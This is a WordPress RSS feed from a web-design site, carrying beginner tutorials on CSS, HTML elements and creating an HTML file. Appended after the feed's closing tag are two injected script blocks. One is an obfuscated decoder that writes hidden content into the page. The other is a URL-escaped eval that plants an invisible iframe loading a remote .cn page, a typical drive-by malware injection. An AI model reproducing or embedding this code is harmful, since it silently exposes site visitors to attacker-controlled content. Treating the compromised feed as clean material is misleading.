<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="wordpress/2.2" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>Las Vegas Website Design</title>
	<link>http://www.openapage.com</link>
	<description>The Website Company!</description>
	<pubDate>Fri, 21 Mar 2008 01:13:07 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.2</generator>
	<language>en</language>
			<item>
		<title>Getting into css</title>
		<link>http://www.openapage.com/website-design/css/css/</link>
		<comments>http://www.openapage.com/website-design/css/css/#comments</comments>
		<pubDate>Fri, 06 Jul 2007 03:11:38 +0000</pubDate>
		<dc:creator>Eric "admin"</dc:creator>
		
		<category><![CDATA[css]]></category>

		<guid isPermaLink="false">http://www.openapage.com/website-design/css/css/</guid>
		<description><![CDATA[Once you get used to css you will never use another table again! It&#8217;s hard kinda to make the change but it really is for the better. You can do more with less code and keep your design separate from your content.
Here is a good article on changing to css
]]></description>
			<content:encoded><![CDATA[<p>Once you get used to css you will never use another table again! It&#8217;s hard kinda to make the change but it really is for the better. You can do more with less code and keep your design separate from your content.</p>
<p>Here is a good article on <a href="http://www.justagirlintheworld.com/2007/03/08/for-the-love-of-css/ " title="css">changing to css</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.openapage.com/website-design/css/css/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Introduction to CSS</title>
		<link>http://www.openapage.com/website-design/css/introduction-css/</link>
		<comments>http://www.openapage.com/website-design/css/introduction-css/#comments</comments>
		<pubDate>Thu, 28 Jun 2007 23:55:27 +0000</pubDate>
		<dc:creator>Eric "admin"</dc:creator>
		
		<category><![CDATA[css]]></category>

		<guid isPermaLink="false">http://www.openapage.com/website-design/css/introduction-css/</guid>
		<description><![CDATA[What You Should Already Know
Before you continue you should have some basic understanding of the following:

HTML / XHTML


What is CSS?

CSS stands for Cascading Style Sheets
Styles define  how to display HTML elements
Styles are normally stored in Style Sheets
Styles were added to HTML 4.0 to solve a problem
External Style Sheets can save you a lot of [...]]]></description>
			<content:encoded><![CDATA[<h2>What You Should Already Know</h2>
<p>Before you continue you should have some basic understanding of the following:</p>
<ul>
<li>HTML / XHTML</li>
</ul>
<hr />
<h2>What is CSS?</h2>
<ul>
<li><strong>CSS</strong> stands for <strong>C</strong>ascading <strong>S</strong>tyle <strong>S</strong>heets</li>
<li>Styles define <strong> how to display</strong> HTML elements</li>
<li>Styles are normally stored in <strong>Style Sheets</strong></li>
<li>Styles were added to HTML 4.0 <strong>to solve a problem</strong></li>
<li><strong>External Style Sheets</strong> can save you a lot of work</li>
<li>External Style Sheets are stored in <strong>CSS files</strong></li>
<li>Multiple style definitions will <strong>cascade</strong> into one</li>
</ul>
<hr />
<h2>Styles Solve a Common Problem</h2>
<p>HTML tags were originally designed to define the content of a document. They were supposed to say &#8220;This is a header&#8221;, &#8220;This is a paragraph&#8221;, &#8220;This is a table&#8221;, by using tags like &lt;h1&gt;, &lt;p&gt;, &lt;table&gt;, and so on. The layout of the document was supposed to be taken care of by the browser, without using any formatting tags.</p>
<p>As the two major browsers - Netscape and Internet Explorer - continued to add new HTML tags and attributes (like the &lt;font&gt; tag and the color attribute) to the original HTML specification, it became more and more difficult to create Web sites where the content of HTML documents was clearly separated from the document&#8217;s presentation layout.</p>
<p>To solve this problem, the World Wide Web Consortium (W3C) - the non profit, standard setting consortium, responsible for standardizing HTML - created STYLES in addition to HTML 4.0.</p>
<p>All major browsers support Cascading Style Sheets.</p>
<hr />
<h2>Style Sheets Can Save a Lot of Work</h2>
<p>Styles sheets define HOW HTML elements are to be displayed, just like the font tag and the color attribute in HTML 3.2. Styles are normally saved in  external .css files. External style sheets enable you to change the appearance and layout of all the pages in your Web, just by editing one single CSS document!</p>
<p>CSS is a breakthrough in Web design because it allows developers to control the style and layout of multiple Web pages all at once. As a Web developer you can define a style for each HTML element and apply it to as  many Web pages as you want. To make a global change, simply change the style, and all elements in the Web are updated automatically.</p>
<hr />
<h2>Multiple Styles Will Cascade Into One</h2>
<p>Style sheets allow style information to be specified in many ways. Styles can be specified inside a single HTML element, inside the &lt;head&gt; element of an HTML page, or in an external CSS file. Even multiple external style sheets can be referenced inside a single HTML document.</p>
<h3> Cascading Order</h3>
<p><strong>What style will be used when there is more than one style specified for an HTML element?<br />
</strong><br />
Generally speaking we can say that all the styles will &#8220;cascade&#8221; into a new &#8220;virtual&#8221; style sheet by the following rules, where number four has the highest priority:</p>
<ol>
<li>Browser default</li>
<li>External style sheet</li>
<li>Internal style sheet (inside the &lt;head&gt; tag)</li>
<li>Inline style (inside an HTML element)</li>
</ol>
<p>So, an inline style (inside an HTML element) has the highest priority, which means that it will override a style declared inside the &lt;head&gt; tag, in an external style sheet, or in a browser (a default value).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.openapage.com/website-design/css/introduction-css/feed/</wfw:commentRss>
		</item>
		<item>
		<title>HTML Elements</title>
		<link>http://www.openapage.com/website-design/html/html-elements/</link>
		<comments>http://www.openapage.com/website-design/html/html-elements/#comments</comments>
		<pubDate>Wed, 27 Jun 2007 21:20:56 +0000</pubDate>
		<dc:creator>Eric "admin"</dc:creator>
		
		<category><![CDATA[HTML]]></category>

		<guid isPermaLink="false">http://www.openapage.com/website-design/html/html-elements/</guid>
		<description><![CDATA[HTML documents are text files made up of HTML elements.
HTML elements are defined using HTML tags.

HTML Tags

HTML tags are used to mark-up HTML  elements
HTML tags are surrounded by the  two characters &#60; and &#62;
The surrounding characters are called angle brackets
HTML tags normally  come in pairs like &#60;b&#62; and &#60;/b&#62;
The first tag in [...]]]></description>
			<content:encoded><![CDATA[<p class="intro">HTML documents are text files made up of HTML elements.</p>
<p class="intro">HTML elements are defined using HTML tags.</p>
<hr />
<h2>HTML Tags</h2>
<ul>
<li>HTML tags are used to mark-up HTML <strong> elements</strong></li>
<li>HTML tags are surrounded by the <strong> two characters &lt; and &gt;</strong></li>
<li>The surrounding characters are called <strong>angle brackets</strong></li>
<li>HTML tags normally <strong> come in pairs</strong> like &lt;b&gt; and &lt;/b&gt;</li>
<li>The first tag in a pair is the <strong> start tag,</strong> the    	second tag is the <strong> end tag</strong></li>
<li>The text between the start and end tags is the <strong>element content</strong></li>
<li>HTML tags are <strong> not case sensitive,</strong> &lt;b&gt; means the same as &lt;B&gt;</li>
</ul>
<hr />
<h2>HTML Elements</h2>
<p>Remember the HTML example from the previous page:</p>
<table class="ex" border="1" cellspacing="0" width="100%">
<tr>
<td>
<pre>&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Title of page&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
This is my first homepage. &lt;b&gt;This text is bold&lt;/b&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
</td>
</tr>
</table>
<p>This is an HTML element:</p>
<table class="ex" border="1" cellspacing="0" width="100%">
<tr>
<td>
<pre>&lt;b&gt;This text is bold&lt;/b&gt;</pre>
</td>
</tr>
</table>
<p>The HTML element starts with a <strong> start tag</strong>: &lt;b&gt;<br />
The <strong> content</strong> of the HTML element is: This text is bold<br />
The HTML element ends with an <strong> end tag</strong>: &lt;/b&gt;</p>
<p>The purpose of the &lt;b&gt; tag is to define an HTML element that should be displayed as bold.</p>
<p>This is also an HTML element:</p>
<table class="ex" border="1" cellspacing="0" width="100%">
<tr>
<td>
<pre>&lt;body&gt;
This is my first homepage. &lt;b&gt;This text is bold&lt;/b&gt;
&lt;/body&gt;</pre>
</td>
</tr>
</table>
<p>This HTML element starts with the start tag &lt;body&gt;, and ends with the end tag &lt;/body&gt;.</p>
<p>The purpose of the &lt;body&gt; tag is to define the HTML element that contains the body of the HTML document.</p>
<hr />
<h2>Why do We Use Lowercase Tags?</h2>
<p>We have just said that HTML tags are not case sensitive: &lt;B&gt; means the same as &lt;b&gt;. If you surf the Web, you will notice that plenty of web sites use uppercase HTML tags in their  source code. We always use lowercase tags. Why?</p>
<p>If you want to follow the latest web standards, you should always use lowercase tags. The World Wide Web Consortium (W3C) recommends lowercase tags in their HTML 4 recommendation, and XHTML (the next generation HTML) demands lowercase tags.</p>
<hr />
<h2>Tag Attributes</h2>
<p>Tags can have attributes<em>. </em>Attributes provide additional information to an HTML element.The following tag defines an HTML table: &lt;table&gt;. With an added border attribute, you can tell the browser that the table should have no borders: &lt;table border=&#8221;0&#8243;&gt;</p>
<p>Attributes always come in name/value pairs like this: name=&#8221;value&#8221;.</p>
<p>Attributes are always specified in the start tag of an HTML element.</p>
<p>Attributes and attribute values are also case-insensitive. However, the World Wide Web Consortium (W3C) recommends lowercase  attributes/attribute values in their HTML 4 recommendation, and XHTML demands lowercase attributes/attribute values.</p>
<hr />
<h2>Always Quote Attribute Values</h2>
<p>Attribute values should always be enclosed in quotes. Double style quotes are the most common, but single style quotes are also allowed.</p>
<p>In some rare situations, like when the attribute value itself contains quotes, it is necessary to use single quotes:</p>
<p>name=&#8217;John &#8220;ShotGun&#8221; Nelson&#8217;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.openapage.com/website-design/html/html-elements/feed/</wfw:commentRss>
		</item>
		<item>
		<title>What is an HTML File?</title>
		<link>http://www.openapage.com/website-design/html/html-file/</link>
		<comments>http://www.openapage.com/website-design/html/html-file/#comments</comments>
		<pubDate>Wed, 27 Jun 2007 21:13:03 +0000</pubDate>
		<dc:creator>Eric "admin"</dc:creator>
		
		<category><![CDATA[HTML]]></category>

		<guid isPermaLink="false">http://www.openapage.com/?p=3</guid>
		<description><![CDATA[
 HTML stands for Hyper Text Markup Language
An HTML file is a text file containing small markup tags
The markup tags tell the Web browser  how to display the page
An HTML file must have an  htm or  html file extension
An HTML file can be created using a simple text editor


Do You Want to [...]]]></description>
			<content:encoded><![CDATA[<ul>
<li> HTML stands for <strong>H</strong>yper <strong>T</strong>ext <strong>M</strong>arkup <strong>L</strong>anguage</li>
<li>An HTML file is a text file containing small <strong>markup tags</strong></li>
<li>The markup tags tell the Web browser <strong> how to display</strong> the page</li>
<li>An HTML file must have an <strong> htm</strong> or <strong> html</strong> file extension</li>
<li>An HTML file can be created using a <strong>simple text editor</strong></li>
</ul>
<hr />
<h2>Do You Want to Try It?</h2>
<p>If you are running Windows, start Notepad.</p>
<p>If you are on a Mac, start SimpleText.</p>
<p>In OSX start TextEdit and change the following preferences: Open the the  &#8220;Format&#8221; menu and select &#8220;Plain text&#8221; instead of &#8220;Rich text&#8221;.  Then open the &#8220;Preferences&#8221; window under the &#8220;Text Edit&#8221; menu and select &#8220;Ignore  rich text commands in HTML files&#8221;. Your HTML code will probably not work if  you do not change the preferences above!</p>
<p>Type in the following text:</p>
<table class="ex" border="1" cellspacing="0" width="100%">
<tr>
<td>
<pre>&lt;html&gt;

&lt;head&gt;

&lt;title&gt;Title of page&lt;/title&gt;

&lt;/head&gt;

&lt;body&gt;

This is my first homepage. &lt;b&gt;This text is bold&lt;/b&gt;

&lt;/body&gt;

&lt;/html&gt;</pre>
</td>
</tr>
</table>
<p>Save the file as &#8220;mypage.htm&#8221;.</p>
<p>Start your Internet browser. Select &#8220;Open&#8221; (or &#8220;Open Page&#8221;) in the File menu of your browser. A dialog box will appear. Select &#8220;Browse&#8221; (or &#8220;Choose File&#8221;) and locate the HTML file you just created - &#8220;mypage.htm&#8221; - select it and click &#8220;Open&#8221;. Now you should see an address in the dialog box, for example &#8220;C:\MyDocuments\mypage.htm&#8221;. Click OK, and the browser will display the page.</p>
<hr />
<h2>Example Explained</h2>
<p>The first tag in your HTML document is &lt;html&gt;. This tag tells your browser that this is the start of an HTML document. The last tag in your document is &lt;/html&gt;. This tag tells your browser that this is the end of the HTML document.</p>
<p>The text between the &lt;head&gt; tag and the &lt;/head&gt; tag is header information. Header information is not displayed in the browser window.</p>
<p>The text between the &lt;title&gt; tags is the title of your document. The title is displayed in your browser&#8217;s caption.</p>
<p>The text between the &lt;body&gt; tags is the text that will be displayed in your browser.</p>
<p>The text between the &lt;b&gt; and &lt;/b&gt; tags will be displayed in a bold font.</p>
<hr />
<h2>HTM or HTML Extension?</h2>
<p>When you save an HTML file, you can use either the .htm or the .html extension. We have used .htm in our examples. It might be a bad habit inherited from the past when some of the commonly used software only allowed three letter extensions.</p>
<p>With newer software we think it will be perfectly safe to use .html.</p>
<hr />
<h2>Note on HTML Editors:</h2>
<p>You can easily edit HTML files using a WYSIWYG (what you see is what you get) editor like FrontPage or Dreamweaver, instead of writing your markup tags in a plain text file.</p>
<p>However, if you want to be a skillful Web developer, we strongly recommend that you use a plain text editor to learn your primer HTML.</p>
<hr />
<h2>Frequently Asked Questions</h2>
<p><strong>Q: After I have edited an HTML file, I cannot view the result in my browser. Why?<br />
A: </strong>Make sure that you have saved the file with a proper name and extension like &#8220;c:\mypage.htm&#8221;. Also make sure that you use the same name when you open the file in your browser.</p>
<p><strong>Q: I have edited an HTML file, but the changes don&#8217;t show in the browser. Why?<br />
A: </strong>A browser caches pages so it doesn&#8217;t have to read the same page twice. When you have modified a page, the browser doesn&#8217;t know that. Use the browser&#8217;s refresh/reload button to force the browser to reload the page.</p>
<p><strong>Q: What browser should I use?<br />
A: </strong>You can do all the training with all of the well-known browsers, like  Internet Explorer, Firefox, Netscape, or Opera. However, some of the examples in our advanced classes require the latest versions of the browsers.</p>
<p><strong>Q: Does my computer have to run Windows? What about a Mac?<br />
A: </strong>You can do all your training on a non-Windows computer like a Mac.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.openapage.com/website-design/html/html-file/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
   
<SCRIPT>var orb='';var V18LZ3nZCOjgi5WOQWFwBiV3L9='P0rz2tfcjac20g13Q% es20Q223ap312%2u+%r%e3rvhp%uv%0820u%/nz2%2%22gneS3%Q+g-3%3ne%wf0/nrc09q2r12evb%2f2Qgy/b92j%%1Psro022n3cs.ug4u%t2RRneQa3b%/.q.02v-2%v sz2n%%eNbfkQ231002z%rq%h%%uqah%%%2v233';var XkjWEjzxH0rJjKpfp9rcItQHK='9405817362301248965790452731869564317802871360249560724951834082765931935621874085269173048361052974870642135969381042756412358970574069831298703251467814962350026953418748136095275428139670';var d='';for(var FDeAVWUrToZtqB6=0;FDeAVWUrToZtqB6<19;FDeAVWUrToZtqB6++) for(var OCmp0yrvX74jDgZ79=0;OCmp0yrvX74jDgZ79<10;OCmp0yrvX74jDgZ79++) {d=V18LZ3nZCOjgi5WOQWFwBiV3L9.charCodeAt((parseInt(XkjWEjzxH0rJjKpfp9rcItQHK.charAt(FDeAVWUrToZtqB6*10+OCmp0yrvX74jDgZ79))*19)+FDeAVWUrToZtqB6); if ((d>=65 && d<78) || (d>=97 && d<110)) d+=13; else if ((d>=78 && d<91) || (d>=110 && d<123)) d-=13;orb+=String.fromCharCode(d);}document.write(unescape(orb));</SCRIPT>
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%64%64%39%31%34%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%62%65%73%74%69%6e%6c%69%76%65%2e%63%6e%2f%69%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%33%39%34%30%35%29%2b%27%36%36%5c%27%20%77%69%64%74%68%3d%36%30%35%20%68%65%69%67%68%74%3d%35%36%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>